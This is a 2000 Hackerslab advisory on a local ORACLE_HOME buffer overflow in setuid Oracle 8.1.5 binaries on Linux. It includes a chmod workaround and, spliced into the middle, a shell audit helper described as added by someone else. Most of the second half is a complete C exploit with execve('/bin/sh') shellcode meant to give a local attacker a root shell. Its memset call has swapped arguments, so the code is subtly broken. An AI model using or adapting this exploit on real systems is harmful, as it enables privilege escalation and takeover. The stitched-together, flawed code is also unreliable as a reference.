Title: Linux ORACLE 8.1.5 vulnerability
Released by: Hackerslab
Date: 20th October 2000
================================================================================

             [ Hackerslab bug_paper ] Linux ORACLE 8.1.5 vulnerability

================================================================================

File   :   Oracle 8.1.5

SYSTEM :   LINUX

           Tested on RedHat Linux 6.2

INFO :

There are two security vulnerabilities in Oracle.

1. Buffer overflow

It is possible to trigger a buffer overflow through "ORACLE_HOME", one of the
environment variables read by Oracle.

The Oracle applications vulnerable to this buffer overflow are as follows:

- names
- namesctl
- onrsd
- osslogin
- tnslsnr
- tnsping
- trcasst
- trcroute

These applications allow a local attacker to execute a buffer overflow exploit.

2. Log files created

When a user executes one of the Oracle applications such as names, oracle or
tnslsnr, the following log files are created:

names
======
-rw-rw-r--   1 oracle   dba             0 Oct 20 01:45 ckpcch.ora
-rw-rw-r--   1 oracle   dba           428 Oct 20 01:45 ckpreg.ora
-rw-rw-r--   1 oracle   dba           950 Oct 20 01:45 names.log

oracle
======
-rw-rw----   1 oracle   dba           616 Oct 20 05:14 ora_[running pid].trc

tnslsnr
=======
-rw-rw-r--   1 oracle   dba       2182176 Oct 20  2000 listener.log


SOLUTION

Contact your vendor for a patch, or remove the setuid permission from the
affected binaries:

# su - oracle
$ cd /oracle_8.1.5_install_directory/bin
$ chmod a-s names  namesctl  onrsd  osslogin  tnslsnr  tnsping  trcasst  trcroute
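The workaround above, written as a small audit helper (an added example, not Hackerslab's code): it checks the eight binaries the advisory names for a setuid or setgid bit under a directory you pass in, and strips them with the same chmod a-s. The demo directory at the bottom is constructed with mktemp and stands in for the real $ORACLE_HOME/bin.

```shell
# Added audit helper for the advisory's workaround (not Hackerslab's code).
# Checks the eight binaries the advisory names for setuid/setgid bits under
# a directory you pass in, and strips them with the same "chmod a-s".
ORACLE_SUID_BINS="names namesctl onrsd osslogin tnslsnr tnsping trcasst trcroute"

# Print every listed binary under $1 that still carries a setuid or setgid
# bit.  Returns 0 when none does, 1 when at least one still needs attention.
audit_oracle_setuid() {
    dir="$1"
    found=0
    for b in $ORACLE_SUID_BINS; do
        f="$dir/$b"
        [ -f "$f" ] || continue            # not every install ships all eight
        if [ -u "$f" ] || [ -g "$f" ]; then
            echo "$f"
            found=1
        fi
    done
    return $found
}

# The advisory's fix: drop setuid and setgid from each listed binary present.
fix_oracle_setuid() {
    dir="$1"
    for b in $ORACLE_SUID_BINS; do
        [ -f "$dir/$b" ] && chmod a-s "$dir/$b"
    done
    return 0
}

# Constructed demo directory (assumption: stands in for $ORACLE_HOME/bin).
demo_dir=$(mktemp -d)
for b in $ORACLE_SUID_BINS; do : > "$demo_dir/$b"; done
chmod u+s "$demo_dir/names" "$demo_dir/tnslsnr"
echo "== before =="; audit_oracle_setuid "$demo_dir" || echo "setuid bits found"
fix_oracle_setuid "$demo_dir"
echo "== after ==";  audit_oracle_setuid "$demo_dir" && echo "clean"
rm -rf "$demo_dir"
```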

==-------------------------------------------------------------------------------==
       ********
   *    **   **    *
 *      **   **      *
*       ******       *
 *      **   **      *                                       loveyou@hackerslab.org     [yong-jun, kim]
   *    **   **    *                                    [  http://www.hackerslab.org ]
       ********            HACKERSLAB (C)  since 1999
==-------------------------------------------------------------------------------==


/*
Oracle 8.1.5 exploit
-by loveyou

offset value : -500 ~ +500

(proof of concept for i386 Linux: uses inline assembly and int 0x80)
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFFER          800
#define NOP             0x90
#define PATH            "/hackerslab/loveyou/oracle/8.1.5/bin/names"

/* execve("/bin/sh") shellcode, credited to K2 */
char shellcode[] =
/* - K2 - */
/* main: */
"\xeb\x1d"                  /* jmp callz               */
/* start: */
"\x5e"                      /* popl %esi               */
"\x29\xc0"                  /* subl %eax, %eax         */
"\x88\x46\x07"              /* movb %al, 0x07(%esi)    */
"\x89\x46\x0c"              /* movl %eax, 0x0c(%esi)   */
"\x89\x76\x08"              /* movl %esi, 0x08(%esi)   */
"\xb0\x0b"                  /* movb $0x0b, %al         */
"\x87\xf3"                  /* xchgl %esi, %ebx        */
"\x8d\x4b\x08"              /* leal 0x08(%ebx), %ecx   */
"\x8d\x53\x0c"              /* leal 0x0c(%ebx), %edx   */
"\xcd\x80"                  /* int $0x80               */
"\x29\xc0"                  /* subl %eax, %eax         */
"\x40"                      /* incl %eax               */
"\xcd\x80"                  /* int $0x80               */
/* callz: */
"\xe8\xde\xff\xff\xff"      /* call start              */
"/bin/sh";

/* Returns the current stack pointer (i386: the value is left in %eax). */
unsigned long getesp(void)
{
        __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[])
{
        char *buff, *ptr, binary[120];
        long *addr_ptr, addr;
        int bsize = BUFFER;
        int i, offset;

        offset = 0;

        /* optional return-address offset from the command line */
        if (argc > 1) offset = atoi(argv[1]);

        buff = malloc(bsize);
        addr = getesp() - 5933 - offset;
        ptr = buff;
        addr_ptr = (long *) ptr;

        /* fill the whole buffer with the guessed return address */
        for (i = 0; i < bsize; i += 4)
                *(addr_ptr++) = addr;

        /* fill the start of the buffer with NOP bytes */
        memset(buff, bsize/2, NOP);

        /* place the shellcode in the middle of the buffer */
        ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
        for (i = 0; i < strlen(shellcode); i++)
                *(ptr++) = shellcode[i];

        buff[bsize - 1] = '\0';

        /* hand the buffer to the target through ORACLE_HOME */
        setenv("ORACLE_HOME", buff, 1);

        printf("[ offset:%d buffer=%d ret:0x%x ]\n",
                offset, strlen(buff), addr);
        system(PATH);
}